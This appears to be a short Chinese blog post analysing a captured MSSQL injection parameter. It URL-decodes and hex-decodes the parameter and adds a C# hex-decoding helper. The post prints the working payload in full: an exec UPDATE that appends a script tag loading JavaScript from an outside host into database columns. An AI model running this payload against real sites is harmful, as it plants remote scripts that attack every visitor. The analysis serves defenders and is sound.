大概输入的一段参数
exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20f"
1:看到 %20%2b,很显然这是URLEncode,通过Server.UrlDecode方法解密得到
exec('UpDaTe ['+@t+'] sEt ['+@c+']=rtrim(convert(varchar,['+@c+']))+cAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D aS vArChAr(67))') f
2:可以很清楚的看到cAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D aS vArChAr(67)) 这段也是编过码的。看到ox开头应该是16进制。
最简单的方式是在MSSQL中运行
SELECT cast(0x223E223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D aS vArChAr(67))
就可以看到如下结果:
">"></title><script src=http://s.see9.us/s.js></script><!--
但为了以后方便。写了一段C#代码:
public static string Decode(string decode)
{
string result = "";
for (int i = 0; i < decode.Length / 2; i++)
{
result += (char)short.Parse(decode.Substring(i * 2, 2), global::System.Globalization.NumberStyles.HexNumber);
}
return result;
}
--=阅读快乐=--
欢迎访问我的新鱼塘 www.pumaboyd.com
